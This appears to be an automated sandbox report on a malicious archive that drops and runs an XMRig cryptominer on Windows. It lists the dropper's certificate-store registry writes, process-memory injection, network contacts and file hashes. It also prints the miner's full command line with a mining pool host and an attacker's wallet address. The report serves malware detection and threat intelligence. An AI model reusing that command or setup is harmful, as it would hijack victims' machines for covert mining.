Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Executes dropped EXE
Unsigned PE
Modifies system certificate store
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-13 23:23
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:13
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1492 wrote to memory of 3108 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1492 wrote to memory of 3108 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3108-14-0x000002BEA3410000-0x000002BEA3430000-memory.dmp
memory/3108-15-0x000002BEA4F20000-0x000002BEA4F40000-memory.dmp
memory/3108-16-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-18-0x000002BF37910000-0x000002BF37930000-memory.dmp
memory/3108-17-0x000002BF376E0000-0x000002BF37700000-memory.dmp
memory/3108-19-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-20-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-23-0x000002BF37910000-0x000002BF37930000-memory.dmp
memory/3108-22-0x000002BF376E0000-0x000002BF37700000-memory.dmp
memory/3108-21-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-24-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-25-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-26-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-27-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-28-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-29-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-30-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-31-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-32-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-33-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-34-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-35-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-36-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-37-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-38-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-39-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-40-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-41-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-42-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-43-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-44-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-45-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-46-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-47-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-48-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-49-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-50-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-51-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-52-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-53-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-54-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-55-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-56-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-57-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-58-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-59-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-60-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-61-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-62-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-63-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-64-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-65-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-66-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-67-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-68-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-69-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-70-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-71-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-72-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-73-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-74-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-75-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-76-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-77-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-78-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-79-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-80-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-81-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-82-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:41
Platform
win10v2004-20240611-en
Max time kernel
1794s
Max time network
1806s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
